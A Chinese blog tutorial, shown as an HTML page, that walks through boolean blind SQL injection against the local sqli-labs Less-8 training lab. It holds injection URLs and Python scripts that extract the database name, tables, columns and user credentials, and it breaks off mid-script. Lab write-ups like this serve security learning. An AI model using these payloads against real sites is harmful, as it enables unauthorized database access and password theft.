<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Robato Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="流年、乱了浮生" type="application/atom+xml">






<meta name="description" content="概论盲注：在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。盲注一般分为布尔盲注（Booleanbase）、基于时间的盲注（Timebase）、报错的盲注（Errorbase）。 布尔型：页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据 常用函数：">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入&lt;三&gt;-bool盲注">
<meta property="og:url" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/index.html">
<meta property="og:site_name" content="流年、乱了浮生">
<meta property="og:description" content="概论盲注：在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。盲注一般分为布尔盲注（Booleanbase）、基于时间的盲注（Timebase）、报错的盲注（Errorbase）。 布尔型：页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据 常用函数：">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804150105.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804151156.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804151207.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804161716.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804175035.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804181424.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213103.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213230.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213311.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213447.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213501.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153015.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153106.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153237.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153253.png">
<meta property="og:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153305.png">
<meta property="og:updated_time" content="2019-08-14T15:39:27.916Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入&lt;三&gt;-bool盲注">
<meta name="twitter:description" content="概论盲注：在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。盲注一般分为布尔盲注（Booleanbase）、基于时间的盲注（Timebase）、报错的盲注（Errorbase）。 布尔型：页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据 常用函数：">
<meta name="twitter:image" content="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804150105.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/">





  <title>SQL注入<三>-bool盲注 | 流年、乱了浮生</三></title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">流年、乱了浮生</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">“勿忘初心，方得始终”</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/27/SQL注入-三-bool盲注/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="袁">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/header.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="流年、乱了浮生">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入<三>-bool盲注</三></h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-07-27T23:42:37+08:00">
                2019-07-27
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="概论"><a href="#概论" class="headerlink" title="概论"></a>概论</h2><p><strong>盲注</strong>：在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。盲注一般分为布尔盲注（Booleanbase）、基于时间的盲注（Timebase）、报错的盲注（Errorbase）。</p>
<p><strong>布尔型</strong>：页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据</p>
<p><strong>常用函数</strong>：<a id="more"></a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">length(str)：返回str字符串的长度。</span><br><span class="line">substr(str, pos, len)：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从<span class="number">1</span>开始的，不是数组的<span class="number">0</span>开始</span><br><span class="line">mid(str,pos,len):同上</span><br><span class="line">ascii(str)：返回字符串str的最左面字符的ASCII代码值。</span><br><span class="line">ord(str):同上，返回ascii码</span><br><span class="line"><span class="keyword">if</span>(a,b,c) :a为条件，a为true，返回b，否则返回c，如<span class="keyword">if</span>(<span class="number">1</span>&gt;<span class="number">2</span>,<span class="number">1</span>,<span class="number">0</span>),返回<span class="number">0</span></span><br><span class="line">sleep(n)：将程序挂起一段时间 n为n秒</span><br></pre></td></tr></table></figure>
<h2 id="sqli-labs-nbsp-less8"><a href="#sqli-labs-nbsp-less8" class="headerlink" title="sqli-labs&nbsp;less8"></a>sqli-labs&nbsp;less8</h2><p>以sqli平台第八题为例写一下布尔盲注</p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804150105.png" alt="1"></p>
<p>进行注入测试</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-8/?id=1</span><br><span class="line">http://127.0.0.1/sqli-labs-master/Less-8/?id=1'</span><br><span class="line">http://127.0.0.1/sqli-labs-master/Less-8/?id=1"</span><br><span class="line">http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+</span><br></pre></td></tr></table></figure>
<p>发现id=1’时页面没有返回内容应该就是不正确页面加上注释符后显示正确页面，可以确定单引号存在注入，正确页面显示<code>you are in………..</code>不正确页面没有</p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804151156.png" alt="2"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804151207.png" alt="3"></p>
<p>可以参考下源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//部分关键源码，源码下载：https://github.com/Audi-1/sqli-labs，可以搭建在本地</span></span><br><span class="line"><span class="comment">//including the Mysql connect parameters.</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"../sql-connections/sql-connect.php"</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="comment">// take the variables</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'id'</span>]))<span class="comment">//GET方式传入id</span></span><br><span class="line">&#123;</span><br><span class="line">$id=$_GET[<span class="string">'id'</span>];</span><br><span class="line"><span class="comment">//logging the connection parameters to a file for analysis.</span></span><br><span class="line">$fp=fopen(<span class="string">'result.txt'</span>,<span class="string">'a'</span>);</span><br><span class="line">fwrite($fp,<span class="string">'ID:'</span>.$id.<span class="string">"\n"</span>);</span><br><span class="line">fclose($fp);</span><br><span class="line"></span><br><span class="line"><span class="comment">// connectivity </span></span><br><span class="line"></span><br><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id='$id' LIMIT 0,1"</span>;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>($row)	<span class="comment">//查到数据执行如下</span></span><br><span class="line">	&#123;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;	</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'You are in...........'</span>;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    	<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">  	&#125;</span><br><span class="line">	<span class="keyword">else</span> 	<span class="comment">//否则执行如下	从两者返回的网页结构不一样，可以作为我们盲注条件判断的依据</span></span><br><span class="line">	&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;</span><br><span class="line">	<span class="comment">//源码中注释了报错信息，所以不能用报错注入	</span></span><br><span class="line">	<span class="comment">//echo 'You are in...........';</span></span><br><span class="line">	<span class="comment">//print_r(mysql_error());</span></span><br><span class="line">	<span class="comment">//echo "You have an error in your SQL syntax";</span></span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;&lt;/font&gt;"</span>;	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font color= "#0000ff" font size= 3&gt;'</span>;	</span><br><span class="line">	</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">	<span class="keyword">else</span> &#123; <span class="keyword">echo</span> <span class="string">"Please input the ID as parameter with numeric value"</span>;&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>看出之前的测试结果正确</p>
<p><strong>判断数据库长度</strong></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())&gt;1 --+</span><br><span class="line">http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())&gt;2 --+</span><br><span class="line">以此类推...</span><br></pre></td></tr></table></figure>
<p>发现值为8时页面没有显示，说明database()的长度是8</p>
<p><strong>爆数据库名</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=2' and ascii(substr(database(),1,1))&gt;99 --+或</span><br><span class="line">?id=2' and ascii(substr(database(),1,1))=99 <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>原理就是依次取出数据库名中的一个字符通过比较ASCII码值来判断猜出数据库名，这样就不能一个一个试了，需要写脚本，现在脚本不会写就借鉴大佬的了。<a href="https://blog.csdn.net/weixin_40709439/article/details/81355856" target="_blank" rel="noopener">爆数据库长度和数据库名python脚本</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">database_len</span><span class="params">()</span>:</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">10</span>):</span><br><span class="line">		url = <span class="string">'''http://127.0.0.1/sqli-labs-master/Less-8/index.php'''</span></span><br><span class="line">		payload = <span class="string">'''?id=1' and length(database())&gt;%s'''</span> %i</span><br><span class="line">		<span class="comment"># print(url+payload+'%23')</span></span><br><span class="line">		r = requests.get(url+payload+<span class="string">'%23'</span>)</span><br><span class="line">		<span class="keyword">if</span> <span class="string">'You are in'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">			print(i)</span><br><span class="line"> </span><br><span class="line">		<span class="keyword">else</span>:</span><br><span class="line">			<span class="comment">#print('false')</span></span><br><span class="line">			print(<span class="string">'database_length:'</span>,i)</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line">database_len()</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">database_name</span><span class="params">()</span>:</span></span><br><span class="line">	name = <span class="string">''</span></span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">9</span>): //数据库长度为<span class="number">8</span></span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">'sqcwertyuioplkjhgfdazxvbnm'</span>:</span><br><span class="line">			url = <span class="string">"http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'"</span> %(j,i)</span><br><span class="line">			<span class="comment"># print(url+'%23')</span></span><br><span class="line">			r = requests.get(url+<span class="string">'%23'</span>)</span><br><span class="line">			<span class="keyword">if</span> <span class="string">'You are in'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">				name = name+i</span><br><span class="line">				</span><br><span class="line">				print(name)</span><br><span class="line">				</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">	print(<span class="string">'database_name:'</span>,name)</span><br><span class="line">	</span><br><span class="line">database_name()</span><br></pre></td></tr></table></figure>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804161716.png" alt="4"></p>
<p>得到数据库名<code>security</code></p>
<p><strong>爆表名</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1' and (ascii(substr((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)))&gt;<span class="number">96</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>原理和报数据库名是一样的，知识把database()换成了查表名语句，脚本把上面修改一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">table_name</span><span class="params">()</span>:</span></span><br><span class="line">	name = <span class="string">''</span></span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">9</span>):</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">'sqcwertyuioplkjhgfdazxvbnm'</span>:</span><br><span class="line">			url = <span class="string">"http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1)))=ord('%s')"</span> %(j,i)</span><br><span class="line">			<span class="comment"># print(url+'%23')</span></span><br><span class="line">			r = requests.get(url+<span class="string">'%23'</span>)</span><br><span class="line">			<span class="keyword">if</span> <span class="string">'You are in'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">				name = name+i</span><br><span class="line">				</span><br><span class="line">				print(name)</span><br><span class="line">				</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">	print(<span class="string">'table_name:'</span>,name)</span><br><span class="line"></span><br><span class="line">table_name()</span><br></pre></td></tr></table></figure>
<p>修改<code>limit 0,1</code>，分别改成<code>limit 1,1</code>、<code>limit 1,1</code>、<code>limit 2,1</code>、<code>limit 3,1</code>，可以得到四个表名<code>emails</code>、<code>referers</code>、<code>uagents</code>、<code>users</code></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804175035.png" alt="5"></p>
<p><strong>爆列名</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1' and ascii(substr((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">116</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>表应该是users了，脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">column_name</span><span class="params">()</span>:</span></span><br><span class="line">	name = <span class="string">''</span></span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">9</span>):</span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> <span class="string">'sqcwertyuioplkjhgfdazxvbnm'</span>:</span><br><span class="line">			url = <span class="string">"http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),%d,1)))=ord('%s')"</span> %(j,i)</span><br><span class="line">			<span class="comment"># print(url+'%23')</span></span><br><span class="line">			r = requests.get(url+<span class="string">'%23'</span>)</span><br><span class="line">			<span class="keyword">if</span> <span class="string">'You are in'</span> <span class="keyword">in</span> r.text:</span><br><span class="line">				name = name+i</span><br><span class="line">				</span><br><span class="line">				print(name)</span><br><span class="line">				</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">	print(<span class="string">'column_name:'</span>,name)</span><br><span class="line"></span><br><span class="line">column_name()</span><br></pre></td></tr></table></figure>
<p>同理修改<code>limit 0,1</code>，可以得到三个列名<code>id</code>、<code>username</code>、<code>password</code></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190804181424.png" alt="6"></p>
<p><strong>爆数据</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1' and ascii(substr((<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) &gt; <span class="number">96</span></span><br></pre></td></tr></table></figure>
<p>脚本，<a href="https://www.jianshu.com/p/5989d0dfa227" target="_blank" rel="noopener">源脚本</a></p>
<p>注：原脚本中<code>u.content</code>在python3中好像不能用要改成<code>u.text</code>。因为python3中text返回的是Unicode型的数据 ，content返回的是是二进制的数据，也就是说，如果你想取文本，可以通过u.text，如果想取图片、文件，则可以通过u.content</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf8 -*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">list1 = [<span class="string">'a'</span>, <span class="string">'b'</span>, <span class="string">'c'</span>, <span class="string">'d'</span>, <span class="string">'e'</span>, <span class="string">'f'</span>, <span class="string">'g'</span>, <span class="string">'h'</span>, <span class="string">'i'</span>, <span class="string">'j'</span>, <span class="string">'k'</span>, <span class="string">'l'</span>, <span class="string">'m'</span>, <span class="string">'n'</span>, <span class="string">'o'</span>, <span class="string">'p'</span>, <span class="string">'q'</span>, <span class="string">'r'</span>, <span class="string">'s'</span>, <span class="string">'t'</span>, <span class="string">'u'</span>, <span class="string">'v'</span>, <span class="string">'w'</span>, <span class="string">'x'</span>, <span class="string">'y'</span>, <span class="string">'z'</span>, <span class="string">'@'</span>, <span class="string">'1'</span>, <span class="string">'2'</span>, <span class="string">'3'</span>, <span class="string">'4'</span>, <span class="string">'5'</span>, <span class="string">'6'</span>, <span class="string">'7'</span>, <span class="string">'8'</span>, <span class="string">'9'</span>, <span class="string">'0'</span>, <span class="string">'!'</span>, <span class="string">'-'</span>, <span class="string">'|'</span>, <span class="string">'_'</span>, <span class="string">'A'</span>, <span class="string">'B'</span>, <span class="string">'C'</span>, <span class="string">'D'</span>, <span class="string">'E'</span>, <span class="string">'F'</span>, <span class="string">'G'</span>, <span class="string">'H'</span>, <span class="string">'I'</span>, <span class="string">'J'</span>, <span class="string">'K'</span>, <span class="string">'L'</span>, <span class="string">'M'</span>, <span class="string">'N'</span>, <span class="string">'O'</span>, <span class="string">'P'</span>, <span class="string">'Q'</span>, <span class="string">'R'</span>, <span class="string">'S'</span>, <span class="string">'T'</span>, <span class="string">'U'</span>, <span class="string">'V'</span>, <span class="string">'W'</span>, <span class="string">'X'</span>, <span class="string">'Y'</span>, <span class="string">'Z'</span>, <span class="string">'.'</span>]  <span class="comment"># 字典</span></span><br><span class="line">url = <span class="string">'http://127.0.0.1/sqli-labs-master/Less-8?id=1%27'</span></span><br><span class="line">payload = <span class="string">'%20and%20left((select%20username%20from%20users%20where%20id%20=&#123;n&#125;),&#123;w&#125;)=%27&#123;d&#125;%27%20--%20k'</span></span><br><span class="line">str1 = <span class="string">'You are in...........'</span></span><br><span class="line">username = [<span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>]</span><br><span class="line">password = [<span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>, <span class="string">''</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">15</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">11</span>):</span><br><span class="line">       <span class="keyword">for</span> l <span class="keyword">in</span> list1:</span><br><span class="line">            p = payload.format(n=i, w=j, d=username[i<span class="number">-1</span>]+l)</span><br><span class="line">            u = requests.get(url+p)</span><br><span class="line">            <span class="keyword">if</span> str1 <span class="keyword">in</span> u.text:</span><br><span class="line">                username[i<span class="number">-1</span>] += l</span><br><span class="line">                <span class="keyword">print</span> (<span class="string">u'正在对比第'</span>, i, <span class="string">u'个记录的username的第'</span>, j, <span class="string">u'个字符'</span>, username[i<span class="number">-1</span>])</span><br><span class="line">payload2 = <span class="string">'%20and%20left((select%20password%20from%20users%20where%20id%20=&#123;n&#125;),&#123;w&#125;)=%27&#123;d&#125;%27%20--%20k'</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">15</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">11</span>):</span><br><span class="line">        <span class="keyword">for</span> l <span class="keyword">in</span> list1:</span><br><span class="line">            p = payload2.format(n=i, w=j, d=password[i<span 